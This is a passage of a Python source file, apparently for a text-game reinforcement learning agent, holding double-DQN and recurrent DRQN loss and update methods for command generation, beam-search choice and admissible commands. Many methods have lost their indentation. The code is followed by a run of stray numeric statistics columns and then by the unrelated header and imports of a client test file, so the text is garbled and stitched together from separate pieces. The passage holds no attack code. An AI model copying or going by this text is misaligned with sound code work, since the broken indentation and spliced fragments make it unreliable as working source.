                    utte_string = self.tokenizer.decode(utte)
                    utterances.append(utte_string)
                    indicies.append(utte)
                utterances = [item.replace("[CLS]", "").replace("[SEP]", "").strip() for item in utterances]
                utterances = [item.replace(" in / on ", " in/on " ) for item in utterances]
                # drop the leading [CLS] id, and a trailing [SEP] id if present
                indicies = [item[1:] for item in indicies]
                for i in range(len(indicies)):
                    if indicies[i][-1] == self.word2id["[SEP]"]:
                        indicies[i] = indicies[i][:-1]
                # sample one from all generated beams
                rand_idx = np.random.choice(len(indicies))
                chosen_actions.append(utterances[rand_idx])
                chosen_indices.append(indicies[rand_idx])
            return chosen_actions, chosen_indices, current_dynamics
def command_generation_act(self, observation_strings, task_desc_strings, previous_dynamics, random=False):
with torch.no_grad():
if self.mode == "eval":
return self.command_generation_act_greedy(observation_strings, task_desc_strings, previous_dynamics)
if random:
return self.command_generation_act_random(observation_strings, task_desc_strings, previous_dynamics)
batch_size = len(observation_strings)
greedy_actions, greedy_indices, greedy_current_dynamics = self.command_generation_act_greedy(observation_strings, task_desc_strings, previous_dynamics)
# random number for epsilon greedy
chosen_actions, chosen_indices, current_dynamics = [], [], []
rand_num = np.random.uniform(low=0.0, high=1.0, size=(batch_size,))
for b in range(batch_size):
if rand_num[b] < self.epsilon:
# random
random_actions, random_indices, random_current_dynamics = self.command_generation_act_random(observation_strings[b: b + 1], task_desc_strings[b: b + 1], None if previous_dynamics is None else previous_dynamics[b: b + 1])
chosen_actions.append(random_actions[0])
chosen_indices.append(random_indices[0])
if self.recurrent:
current_dynamics.append(random_current_dynamics[0])
else:
# greedy
chosen_actions.append(greedy_actions[b])
chosen_indices.append(greedy_indices[b])
if self.recurrent:
current_dynamics.append(greedy_current_dynamics[b])
current_dynamics = torch.stack(current_dynamics, 0) if self.recurrent else None # batch x hidden
return chosen_actions, chosen_indices, current_dynamics
# update: admissible commands
    def get_dqn_loss_admissible_commands(self):
        """
        Double-DQN loss with multi-step returns for the admissible-commands
        policy: Q(s,a) from the online net vs. reward + gamma^n * Q_target(s',
        argmax_a Q_online(s', a)). Returns (loss, q_value), or (None, None)
        when the replay memory cannot yet provide a batch.
        """
        if len(self.dqn_memory) < self.replay_batch_size:
            return None, None
        data = self.dqn_memory.get_batch(self.replay_batch_size, multi_step=self.multi_step)
        if data is None:
            return None, None
        obs_list, task_list, candidate_list, action_indices, rewards, next_obs_list, next_candidate_list, actual_ns = data
        if self.use_cuda:
            rewards = rewards.cuda()
        h_obs, obs_mask = self.encode(obs_list, use_model="online")
        h_td, td_mask = self.encode(task_list, use_model="online")
        action_scores, _, _ = self.action_scoring(candidate_list,
                                                  h_obs, obs_mask,
                                                  h_td, td_mask,
                                                  None,
                                                  use_model="online")
        # ps_a — Q-value of the action actually taken
        action_indices = to_pt(action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
        q_value = ez_gather_dim_1(action_scores, action_indices).squeeze(1)  # batch
        # target computation carries no gradient
        with torch.no_grad():
            if self.noisy_net:
                self.target_net.reset_noise()  # Sample new target net noise
            # pns Probabilities p(s_t+n, ·; θonline)
            h_obs, obs_mask = self.encode(next_obs_list, use_model="online")
            next_action_scores, next_action_masks, _ = self.action_scoring(next_candidate_list,
                                                                           h_obs, obs_mask,
                                                                           h_td.detach(), td_mask.detach(),
                                                                           None,
                                                                           use_model="online")
            # Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
            next_action_indices = self.choose_maxQ_action(next_action_scores, next_action_masks)  # batch
            next_action_indices = to_pt(next_action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
            # pns # Probabilities p(s_t+n, ·; θtarget)
            h_obs, obs_mask = self.encode(next_obs_list, use_model="target")
            h_td_t, td_mask_t = self.encode(task_list, use_model="target")
            next_action_scores, _, _ = self.action_scoring(next_candidate_list,
                                                           h_obs, obs_mask,
                                                           h_td_t, td_mask_t,
                                                           None,
                                                           use_model="target")
            # pns_a # Double-Q probabilities p(s_t+n, argmax_a[(z, p(s_t+n, a; θonline))]; θtarget)
            next_q_value = ez_gather_dim_1(next_action_scores, next_action_indices).squeeze(1)  # batch
            # gamma^n, where actual_ns is the realized multi-step horizon per sample
            discount = to_pt((np.ones_like(actual_ns) * self.discount_gamma_game_reward) ** actual_ns, self.use_cuda, type="float")
        rewards = rewards + next_q_value * discount  # batch
        loss = F.smooth_l1_loss(q_value, rewards)
        return loss, q_value
    def get_drqn_loss_admissible_commands(self):
        """
        Recurrent (DRQN) variant of the admissible-commands loss: replays
        sequences of transitions, threading the dynamics state through time,
        and averages the per-step double-DQN losses. Adds a regularization
        term computed from the masked action distribution.
        """
        if len(self.dqn_memory) < self.replay_batch_size:
            return None, None
        data, contains_first_step = self.dqn_memory.get_batch_of_sequences(self.replay_batch_size, sample_history_length=self.rl_replay_sample_history_length)
        if data is None:
            return None, None
        seq_obs, task, seq_candidates, seq_chosen_indices, seq_reward, seq_next_obs, seq_next_candidates = data
        loss_list, q_value_list = [], []
        entropy_list = []
        prev_dynamics = None
        h_td, td_mask = self.encode(task, use_model="online")
        with torch.no_grad():
            h_td_t, td_mask_t = self.encode(task, use_model="target")
        for step_no in range(self.rl_replay_sample_history_length):
            obs, candidates, chosen_indices, reward, next_obs, next_candidates = seq_obs[step_no], seq_candidates[step_no], seq_chosen_indices[step_no], seq_reward[step_no], seq_next_obs[step_no], seq_next_candidates[step_no]
            if self.use_cuda:
                reward = reward.cuda()
            h_obs, obs_mask = self.encode(obs, use_model="online")
            action_scores, action_masks, current_dynamics = self.action_scoring(candidates, h_obs, obs_mask, h_td, td_mask,
                                                                                prev_dynamics, use_model="online")
            # ps_a — Q-value of the action actually taken at this step
            chosen_indices = to_pt(chosen_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
            q_value = ez_gather_dim_1(action_scores, chosen_indices).squeeze(1)  # batch
            prev_dynamics = current_dynamics
            # burn-in: for mid-episode samples, early steps only warm up the
            # recurrent state and contribute no gradient
            if (not contains_first_step) and step_no < self.rl_replay_sample_update_from:
                q_value = q_value.detach()
                prev_dynamics = prev_dynamics.detach()
                continue
            # masked softmax over candidates; large negative offset removes
            # invalid actions, the small constant avoids log(0)
            action_probabilities = (action_scores + (action_masks-1)*999999).softmax(dim=-1) + 0.000001
            logp_pi = torch.log(action_probabilities)
            # logp_pi = torch.where(torch.isinf(logp_pi),torch.full_like(logp_pi,-999999),logp_pi)
            # NOTE(review): this is mean(p * log p), i.e. the NEGATIVE entropy;
            # `loss - 0.5 * entropy_loss` below therefore penalizes high-entropy
            # policies rather than encouraging them — confirm the intended sign.
            entropy = torch.mean(action_probabilities*logp_pi*action_masks, dim=-1)
            entropy_list.append(entropy)
            # target computation carries no gradient
            with torch.no_grad():
                if self.noisy_net:
                    self.target_net.reset_noise()  # Sample new target net noise
                # pns Probabilities p(s_t+n, ·; θonline)
                h_obs, obs_mask = self.encode(next_obs, use_model="online")
                next_action_scores, next_action_masks, _ = self.action_scoring(next_candidates, h_obs, obs_mask, h_td, td_mask,
                                                                               prev_dynamics, use_model="online")
                # Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
                next_action_indices = self.choose_maxQ_action(next_action_scores, next_action_masks)  # batch
                next_action_indices = to_pt(next_action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
                # pns # Probabilities p(s_t+n, ·; θtarget)
                h_obs, obs_mask = self.encode(next_obs, use_model="target")
                next_action_scores, _, _ = self.action_scoring(next_candidates, h_obs, obs_mask, h_td_t, td_mask_t,
                                                               prev_dynamics, use_model="target")
                # pns_a # Double-Q probabilities p(s_t+n, argmax_a[(z, p(s_t+n, a; θonline))]; θtarget)
                next_q_value = ez_gather_dim_1(next_action_scores, next_action_indices).squeeze(1)  # batch
                reward = reward + next_q_value * self.discount_gamma_game_reward  # batch
            loss = F.smooth_l1_loss(q_value, reward)  # 1
            loss_list.append(loss)
            q_value_list.append(q_value)
        # average over the trained steps of the sequence
        loss = torch.stack(loss_list).mean()
        q_value = torch.stack(q_value_list).mean()
        entropy_loss = torch.stack(entropy_list).mean()
        return loss-0.5*entropy_loss, q_value
def update_dqn_admissible_commands(self):
# update neural model by replaying snapshots in replay memory
if self.recurrent:
dqn_loss, q_value = self.get_drqn_loss_admissible_commands()
else:
dqn_loss, q_value = self.get_dqn_loss_admissible_commands()
if dqn_loss is None:
return None, None
# param_with_grad = [param for param in self.online_net.parameters() if param.requires_grad]
# grad_params = torch.autograd.grad(dqn_loss, param_with_grad, create_graph=True, retain_graph=True, allow_unused=True)
# grad_norm = 0
# for grad in grad_params:
# if grad is not None:
# grad_norm += grad.pow(2).sum()
# # grad_norm = grad_norm.sqrt()
# loss = dqn_loss - grad_norm
# loss = loss.cuda()
# Backpropagate
self.online_net.zero_grad()
self.optimizer.zero_grad()
dqn_loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
torch.nn.utils.clip_grad_norm_(self.online_net.parameters(), self.clip_grad_norm)
self.optimizer.step() # apply gradients
return to_np(torch.mean(dqn_loss)), to_np(torch.mean(q_value))
# update: beam search choice
    def get_dqn_loss_beam_search_choice(self):
        """
        Double-DQN loss with multi-step returns for the beam-search-choice
        policy. Observation/task encoding runs under torch.no_grad(), so only
        the candidate-scoring head receives gradients here (loss.backward()
        requires the scoring call itself to be outside the no_grad block).
        Returns (loss, q_value), or (None, None) when no batch is available.
        """
        if len(self.dqn_memory) < self.replay_batch_size:
            return None, None
        data = self.dqn_memory.get_batch(self.replay_batch_size, multi_step=self.multi_step)
        if data is None:
            return None, None
        obs_list, task_list, candidate_list, action_indices, rewards, next_obs_list, next_candidate_list, actual_ns = data
        if self.use_cuda:
            rewards = rewards.cuda()
        # frozen encoder: representations carry no gradient
        with torch.no_grad():
            h_obs, obs_mask = self.encode(obs_list, use_model="online")
            h_td, td_mask = self.encode(task_list, use_model="online")
            aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
        action_scores, _ = self.beam_search_candidate_scoring(candidate_list, aggregated_obs_representation, obs_mask, None, use_model="online")
        # ps_a — Q-value of the candidate actually chosen
        action_indices = to_pt(action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
        q_value = ez_gather_dim_1(action_scores, action_indices).squeeze(1)  # batch
        # target computation carries no gradient
        with torch.no_grad():
            if self.noisy_net:
                self.target_net.reset_noise()  # Sample new target net noise
            # pns Probabilities p(s_t+n, ·; θonline)
            h_obs, obs_mask = self.encode(next_obs_list, use_model="online")
            aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
            next_action_scores, next_action_masks = self.beam_search_candidate_scoring(next_candidate_list, aggregated_obs_representation, obs_mask, None, use_model="online")
            # Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
            next_action_indices = self.choose_maxQ_action(next_action_scores, next_action_masks)  # batch
            next_action_indices = to_pt(next_action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
            # pns # Probabilities p(s_t+n, ·; θtarget)
            h_obs, obs_mask = self.encode(next_obs_list, use_model="target")
            h_td_t, td_mask_t = self.encode(task_list, use_model="target")
            aggregated_obs_representation = self.target_net.aggretate_information(h_obs, obs_mask, h_td_t, td_mask_t) # batch x obs_length x hid
            next_action_scores, _ = self.beam_search_candidate_scoring(next_candidate_list, aggregated_obs_representation, obs_mask, None, use_model="target")
            # pns_a # Double-Q probabilities p(s_t+n, argmax_a[(z, p(s_t+n, a; θonline))]; θtarget)
            next_q_value = ez_gather_dim_1(next_action_scores, next_action_indices).squeeze(1)  # batch
            # gamma^n for the realized multi-step horizon of each sample
            discount = to_pt((np.ones_like(actual_ns) * self.discount_gamma_game_reward) ** actual_ns, self.use_cuda, type="float")
        rewards = rewards + next_q_value * discount  # batch
        loss = F.smooth_l1_loss(q_value, rewards)
        return loss, q_value
    def get_drqn_loss_beam_search_choice(self):
        """
        Recurrent (DRQN) variant of the beam-search-choice loss: replays
        sequences, threading the dynamics state through time, and averages the
        per-step double-DQN losses. Encoder/dynamics run under torch.no_grad();
        only the candidate-scoring head receives gradients.
        """
        if len(self.dqn_memory) < self.replay_batch_size:
            return None, None
        data, contains_first_step = self.dqn_memory.get_batch_of_sequences(self.replay_batch_size, sample_history_length=self.rl_replay_sample_history_length)
        if data is None:
            return None, None
        seq_obs, task, seq_candidates, seq_chosen_indices, seq_reward, seq_next_obs, seq_next_candidates = data
        loss_list, q_value_list = [], []
        prev_dynamics = None
        with torch.no_grad():
            h_td, td_mask = self.encode(task, use_model="online")
            h_td_t, td_mask_t = self.encode(task, use_model="target")
        for step_no in range(self.rl_replay_sample_history_length):
            obs, candidates, chosen_indices, reward, next_obs, next_candidates = seq_obs[step_no], seq_candidates[step_no], seq_chosen_indices[step_no], seq_reward[step_no], seq_next_obs[step_no], seq_next_candidates[step_no]
            if self.use_cuda:
                reward = reward.cuda()
            # frozen encoder + dynamics update; no gradient
            with torch.no_grad():
                h_obs, obs_mask = self.encode(obs, use_model="online")
                aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
                averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
                current_dynamics = self.online_net.rnncell(averaged_representation, prev_dynamics) if prev_dynamics is not None else self.online_net.rnncell(averaged_representation)
            action_scores, _ = self.beam_search_candidate_scoring(candidates, aggregated_obs_representation, obs_mask, current_dynamics, use_model="online")
            # ps_a — Q-value of the candidate actually chosen at this step
            chosen_indices = to_pt(chosen_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
            q_value = ez_gather_dim_1(action_scores, chosen_indices).squeeze(1)  # batch
            prev_dynamics = current_dynamics
            # burn-in: for mid-episode samples, early steps only warm up the
            # recurrent state and contribute no gradient
            if (not contains_first_step) and step_no < self.rl_replay_sample_update_from:
                q_value = q_value.detach()
                prev_dynamics = prev_dynamics.detach()
                continue
            # target computation carries no gradient
            with torch.no_grad():
                if self.noisy_net:
                    self.target_net.reset_noise()  # Sample new target net noise
                # pns Probabilities p(s_t+n, ·; θonline)
                h_obs, obs_mask = self.encode(next_obs, use_model="online")
                aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
                averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
                next_dynamics = self.online_net.rnncell(averaged_representation, current_dynamics) if current_dynamics is not None else self.online_net.rnncell(averaged_representation)
                next_action_scores, next_action_masks = self.beam_search_candidate_scoring(next_candidates, aggregated_obs_representation, obs_mask, next_dynamics, use_model="online")
                # Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
                next_action_indices = self.choose_maxQ_action(next_action_scores, next_action_masks)  # batch
                next_action_indices = to_pt(next_action_indices, enable_cuda=self.use_cuda, type='long').unsqueeze(-1)
                # pns # Probabilities p(s_t+n, ·; θtarget)
                h_obs, obs_mask = self.encode(next_obs, use_model="target")
                aggregated_obs_representation = self.target_net.aggretate_information(h_obs, obs_mask, h_td_t, td_mask_t) # batch x obs_length x hid
                averaged_representation = self.target_net.masked_mean(aggregated_obs_representation, obs_mask) # batch x hid
                next_dynamics = self.target_net.rnncell(averaged_representation, current_dynamics) if current_dynamics is not None else self.target_net.rnncell(averaged_representation)
                next_action_scores, _ = self.beam_search_candidate_scoring(next_candidates, aggregated_obs_representation, obs_mask, next_dynamics, use_model="target")
                # pns_a # Double-Q probabilities p(s_t+n, argmax_a[(z, p(s_t+n, a; θonline))]; θtarget)
                next_q_value = ez_gather_dim_1(next_action_scores, next_action_indices).squeeze(1)  # batch
                reward = reward + next_q_value * self.discount_gamma_game_reward  # batch
            loss = F.smooth_l1_loss(q_value, reward)  # 1
            loss_list.append(loss)
            q_value_list.append(q_value)
        # average over the trained steps of the sequence
        loss = torch.stack(loss_list).mean()
        q_value = torch.stack(q_value_list).mean()
        return loss, q_value
def update_dqn_beam_search_choice(self):
# update neural model by replaying snapshots in replay memory
if self.recurrent:
dqn_loss, q_value = self.get_drqn_loss_beam_search_choice()
else:
dqn_loss, q_value = self.get_dqn_loss_beam_search_choice()
if dqn_loss is None:
return None, None
# Backpropagate
self.online_net.zero_grad()
self.optimizer.zero_grad()
dqn_loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
torch.nn.utils.clip_grad_norm_(self.online_net.parameters(), self.clip_grad_norm)
self.optimizer.step() # apply gradients
return to_np(torch.mean(dqn_loss)), to_np(torch.mean(q_value))
# update: command generation
    def get_dqn_loss_command_generation(self):
        """
        Double-DQN loss with multi-step returns for the command-generation
        policy. Q(s,a) is the sequence-level generation value of the replayed
        command under the online decoder; the bootstrap target re-decodes
        greedily at the next state with the online net (action selection) and
        evaluates it with the target net. Returns (loss, q_value), or
        (None, None) when no batch is available.
        """
        if len(self.dqn_memory) < self.replay_batch_size:
            return None, None
        data = self.dqn_memory.get_batch(self.replay_batch_size, multi_step=self.multi_step)
        if data is None:
            return None, None
        observation_strings, task_desc_strings, _, action_indices, rewards, next_observation_strings, _, actual_ns = data
        batch_size = len(observation_strings)
        if self.use_cuda:
            rewards = rewards.cuda()
        # teacher-forcing pair: decoder input starts with [CLS], target ends with [SEP]
        input_target = [[self.word2id["[CLS]"]] + item for item in action_indices]
        ground_truth = [item + [self.word2id["[SEP]"]] for item in action_indices]
        input_target = self.get_word_input_from_ids(input_target)
        ground_truth = self.get_word_input_from_ids(ground_truth)
        input_obs = self.get_word_input(observation_strings)
        next_input_obs = self.get_word_input(next_observation_strings)
        h_obs, obs_mask = self.encode(observation_strings, use_model="online")
        h_td, td_mask = self.encode(task_desc_strings, use_model="online")
        aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask) # batch x obs_length x hid
        target_mask = compute_mask(input_target) # mask of ground truth should be the same
        pred = self.online_net.decode(input_target, target_mask, aggregated_obs_representation, obs_mask, None, input_obs) # batch x target_length x vocab
        q_value = GetGenerationQValue(pred * target_mask.unsqueeze(-1), ground_truth, target_mask)
        # target computation carries no gradient; `input_target`, `target_mask`
        # and `pred` are reused/overwritten below for the greedy re-decode
        with torch.no_grad():
            if self.noisy_net:
                self.target_net.reset_noise()  # Sample new target net noise
            # pns Probabilities p(s_t+n, ·; θonline)
            next_h_obs, next_obs_mask = self.encode(next_observation_strings, use_model="online")
            next_aggregated_obs_representation = self.online_net.aggretate_information(next_h_obs, next_obs_mask, h_td, td_mask) # batch x obs_length x hid
            # Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
            # greedy generation
            input_target_list = [[self.word2id["[CLS]"]] for i in range(batch_size)]
            # eos[b] flips to 1 once example b has emitted [SEP]
            eos = np.zeros(batch_size)
            for _ in range(self.max_target_length):
                input_target = copy.deepcopy(input_target_list)
                input_target = pad_sequences(input_target, maxlen=max_len(input_target)).astype('int32')
                input_target = to_pt(input_target, self.use_cuda)
                target_mask = compute_mask(input_target) # mask of ground truth should be the same
                pred = self.online_net.decode(input_target, target_mask, next_aggregated_obs_representation, next_obs_mask, None, next_input_obs) # batch x target_length x vocab
                # pointer softmax
                pred = to_np(pred[:, -1]) # batch x vocab
                pred = np.argmax(pred, -1) # batch
                for b in range(batch_size):
                    # finished examples stop growing; others append the argmax token
                    new_stuff = [pred[b]] if eos[b] == 0 else []
                    input_target_list[b] = input_target_list[b] + new_stuff
                    if pred[b] == self.word2id["[SEP]"]:
                        eos[b] = 1
                if np.sum(eos) == batch_size:
                    break
            # drop the leading [CLS] id, and a trailing [SEP] id if present
            chosen_indices = [item[1:] for item in input_target_list]
            for i in range(len(chosen_indices)):
                if chosen_indices[i][-1] == self.word2id["[SEP]"]:
                    chosen_indices[i] = chosen_indices[i][:-1]
            # pns # Probabilities p(s_t+n, ·; θtarget)
            next_input_target = [[self.word2id["[CLS]"]] + item for item in chosen_indices]
            next_ground_truth = [item + [self.word2id["[SEP]"]] for item in chosen_indices]
            next_input_target = self.get_word_input_from_ids(next_input_target)
            next_ground_truth = self.get_word_input_from_ids(next_ground_truth)
            next_h_obs, next_obs_mask = self.encode(next_observation_strings, use_model="target")
            next_h_td, next_td_mask = self.encode(task_desc_strings, use_model="target")
            next_aggregated_obs_representation = self.target_net.aggretate_information(next_h_obs, next_obs_mask, next_h_td, next_td_mask) # batch x obs_length x hid
            next_target_mask = compute_mask(next_input_target) # mask of ground truth should be the same
            next_pred = self.target_net.decode(next_input_target, next_target_mask, next_aggregated_obs_representation, next_obs_mask, None, next_input_obs) # batch x target_length x vocab
            next_q_value = GetGenerationQValue(next_pred * next_target_mask.unsqueeze(-1), next_ground_truth, next_target_mask) # batch
            # gamma^n for the realized multi-step horizon of each sample
            discount = to_pt((np.ones_like(actual_ns) * self.discount_gamma_game_reward) ** actual_ns, self.use_cuda, type="float")
            rewards = rewards + next_q_value * discount # batch
        loss = F.smooth_l1_loss(q_value, rewards)
        return loss, q_value
def get_drqn_loss_command_generation(self):
    """Compute the recurrent (DRQN) double-DQN loss for command generation.

    Replays sequences of transitions from ``self.dqn_memory`` and rolls the
    online network's recurrent dynamics forward step by step.  For each
    trained step the bootstrap target is built double-DQN style: a token
    sequence is greedily generated with the online network, then re-scored
    with the target network.

    Returns:
        tuple: ``(loss, q_value)`` scalar tensors averaged over the replayed
        steps, or ``(None, None)`` when not enough data is available.
    """
    if len(self.dqn_memory) < self.replay_batch_size:
        return None, None
    data, contains_first_step = self.dqn_memory.get_batch_of_sequences(self.replay_batch_size, sample_history_length=self.rl_replay_sample_history_length)
    if data is None:
        return None, None
    seq_obs, task_desc_strings, _, seq_chosen_indices, seq_reward, seq_next_obs, _ = data
    batch_size = len(seq_obs[0])
    loss_list, q_value_list = [], []
    previous_dynamics = None
    h_td, td_mask = self.encode(task_desc_strings, use_model="online")
    with torch.no_grad():
        h_td_t, td_mask_t = self.encode(task_desc_strings, use_model="target")
    for step_no in range(self.rl_replay_sample_history_length):
        observation_strings, action_indices, reward, next_observation_strings = seq_obs[step_no], seq_chosen_indices[step_no], seq_reward[step_no], seq_next_obs[step_no]
        if self.use_cuda:
            reward = reward.cuda()
        input_target = [[self.word2id["[CLS]"]] + item for item in action_indices]
        ground_truth = [item + [self.word2id["[SEP]"]] for item in action_indices]
        input_target = self.get_word_input_from_ids(input_target)
        ground_truth = self.get_word_input_from_ids(ground_truth)
        input_obs = self.get_word_input(observation_strings)
        next_input_obs = self.get_word_input(next_observation_strings)
        h_obs, obs_mask = self.encode(observation_strings, use_model="online")
        aggregated_obs_representation = self.online_net.aggretate_information(h_obs, obs_mask, h_td, td_mask)  # batch x obs_length x hid
        averaged_representation = self.online_net.masked_mean(aggregated_obs_representation, obs_mask)  # batch x hid
        current_dynamics = self.online_net.rnncell(averaged_representation, previous_dynamics) if previous_dynamics is not None else self.online_net.rnncell(averaged_representation)
        target_mask = compute_mask(input_target)  # mask of ground truth should be the same
        pred = self.online_net.decode(input_target, target_mask, aggregated_obs_representation, obs_mask, current_dynamics, input_obs)  # batch x target_length x vocab
        q_value = GetGenerationQValue(pred * target_mask.unsqueeze(-1), ground_truth, target_mask)
        previous_dynamics = current_dynamics
        if (not contains_first_step) and step_no < self.rl_replay_sample_update_from:
            # Burn-in steps: propagate the recurrent state but do not train on them.
            q_value = q_value.detach()
            previous_dynamics = previous_dynamics.detach()
            continue
        with torch.no_grad():
            if self.noisy_net:
                self.target_net.reset_noise()  # Sample new target net noise
            # pns Probabilities p(s_t+n, ·; θonline)
            next_h_obs, next_obs_mask = self.encode(next_observation_strings, use_model="online")
            next_aggregated_obs_representation = self.online_net.aggretate_information(next_h_obs, next_obs_mask, h_td, td_mask)  # batch x obs_length x hid
            next_averaged_representation = self.online_net.masked_mean(next_aggregated_obs_representation, next_obs_mask)  # batch x hid
            # BUGFIX: roll the dynamics forward with the *next* observation's
            # representation.  The original passed `averaged_representation`
            # (the current step's), leaving the freshly computed
            # `next_averaged_representation` unused in this branch.
            next_dynamics = self.online_net.rnncell(next_averaged_representation, current_dynamics) if current_dynamics is not None else self.online_net.rnncell(next_averaged_representation)
            # Perform argmax action selection using online network: argmax_a[(z, p(s_t+n, a; θonline))]
            # greedy generation
            input_target_list = [[self.word2id["[CLS]"]] for i in range(batch_size)]
            eos = np.zeros(batch_size)
            for _ in range(self.max_target_length):
                input_target = copy.deepcopy(input_target_list)
                input_target = pad_sequences(input_target, maxlen=max_len(input_target)).astype('int32')
                input_target = to_pt(input_target, self.use_cuda)
                target_mask = compute_mask(input_target)  # mask of ground truth should be the same
                pred = self.online_net.decode(input_target, target_mask, next_aggregated_obs_representation, next_obs_mask, next_dynamics, next_input_obs)  # batch x target_length x vocab
                # pointer softmax
                pred = to_np(pred[:, -1])  # batch x vocab
                pred = np.argmax(pred, -1)  # batch
                for b in range(batch_size):
                    new_stuff = [pred[b]] if eos[b] == 0 else []
                    input_target_list[b] = input_target_list[b] + new_stuff
                    if pred[b] == self.word2id["[SEP]"]:
                        eos[b] = 1
                if np.sum(eos) == batch_size:
                    break
            chosen_indices = [item[1:] for item in input_target_list]
            for i in range(len(chosen_indices)):
                if chosen_indices[i][-1] == self.word2id["[SEP]"]:
                    chosen_indices[i] = chosen_indices[i][:-1]
            # pns # Probabilities p(s_t+n, ·; θtarget)
            next_input_target = [[self.word2id["[CLS]"]] + item for item in chosen_indices]
            next_ground_truth = [item + [self.word2id["[SEP]"]] for item in chosen_indices]
            next_input_target = self.get_word_input_from_ids(next_input_target)
            next_ground_truth = self.get_word_input_from_ids(next_ground_truth)
            next_h_obs, next_obs_mask = self.encode(next_observation_strings, use_model="target")
            next_aggregated_obs_representation = self.target_net.aggretate_information(next_h_obs, next_obs_mask, h_td_t, td_mask_t)  # batch x obs_length x hid
            next_averaged_representation = self.target_net.masked_mean(next_aggregated_obs_representation, next_obs_mask)  # batch x hid
            # BUGFIX: same argument mix-up as above, for the target network.
            next_dynamics = self.target_net.rnncell(next_averaged_representation, current_dynamics) if current_dynamics is not None else self.target_net.rnncell(next_averaged_representation)
            next_target_mask = compute_mask(next_input_target)  # mask of ground truth should be the same
            next_pred = self.target_net.decode(next_input_target, next_target_mask, next_aggregated_obs_representation, next_obs_mask, next_dynamics, next_input_obs)  # batch x target_length x vocab
            next_q_value = GetGenerationQValue(next_pred * next_target_mask.unsqueeze(-1), next_ground_truth, next_target_mask)  # batch
            reward = reward + next_q_value * self.discount_gamma_game_reward  # batch
        loss = F.smooth_l1_loss(q_value, reward)  # 1
        loss_list.append(loss)
        q_value_list.append(q_value)
    loss = torch.stack(loss_list).mean()
    q_value = torch.stack(q_value_list).mean()
    return loss, q_value
def update_dqn_command_generation(self):
    """Replay one batch from DQN memory and take a single optimizer step.

    Chooses the recurrent (DRQN) or plain DQN loss depending on
    ``self.recurrent``, backpropagates it through the online network with
    gradient clipping, and reports the mean loss and Q-value as numpy values.

    Returns:
        tuple: ``(mean_loss, mean_q_value)`` as numpy scalars, or
        ``(None, None)`` when no loss could be computed.
    """
    loss_fn = (self.get_drqn_loss_command_generation
               if self.recurrent
               else self.get_dqn_loss_command_generation)
    dqn_loss, q_value = loss_fn()
    if dqn_loss is None:
        return None, None
    # Backpropagate through the online network only.
    self.online_net.zero_grad()
    self.optimizer.zero_grad()
    dqn_loss.backward()
    # Clip gradients to guard against exploding gradients in the RNN parts.
    torch.nn.utils.clip_grad_norm_(self.online_net.parameters(), self.clip_grad_norm)
    self.optimizer.step()
    return to_np(torch.mean(dqn_loss)), to_np(torch.mean(q_value))
def update_dqn(self):
    """Dispatch the DQN update to the handler matching ``self.action_space``.

    Raises:
        NotImplementedError: if the configured action space is unknown.
    """
    space = self.action_space
    if space == "generation":
        return self.update_dqn_command_generation()
    if space == "beam_search_choice":
        return self.update_dqn_beam_search_choice()
    if space in ("admissible", "exhaustive"):
        return self.update_dqn_admissible_commands()
    raise NotImplementedError()
| 59.623053
| 240
| 0.622168
| 7,050
| 57,417
| 4.709078
| 0.053617
| 0.029158
| 0.040664
| 0.013253
| 0.902949
| 0.888581
| 0.874514
| 0.863731
| 0.860839
| 0.851471
| 0
| 0.005286
| 0.298204
| 57,417
| 963
| 241
| 59.623053
| 0.818315
| 0.099413
| 0
| 0.792373
| 0
| 0
| 0.014191
| 0.000604
| 0
| 0
| 0
| 0
| 0.002825
| 1
| 0.032486
| false
| 0
| 0.014124
| 0
| 0.111582
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9a907a999989e3e41784c0a5e7498158a7ba6c69
| 42,568
|
py
|
Python
|
tests/test_command.py
|
bp-flugsimulator/client
|
ad2fa25d28f6d05a5ddb8bb3ed1b844a13eddda4
|
[
"MIT"
] | null | null | null |
tests/test_command.py
|
bp-flugsimulator/client
|
ad2fa25d28f6d05a5ddb8bb3ed1b844a13eddda4
|
[
"MIT"
] | 6
|
2018-01-22T21:19:29.000Z
|
2018-03-31T11:45:53.000Z
|
tests/test_command.py
|
bp-flugsimulator/client
|
ad2fa25d28f6d05a5ddb8bb3ed1b844a13eddda4
|
[
"MIT"
] | null | null | null |
"""
Unit tests for the module client.command.
"""
#pylint: disable=C0111, C0103
import unittest
import asyncio
import os
import sys
import random
import string
import websockets
import shutil
from os import remove, getcwd
from os.path import join, isfile
from uuid import uuid4
from utils import Rpc, Status
from .testcases import EventLoopTestCase, FileSystemTestCase
import client.command
import client.shorthand
from client.logger import LOGGER
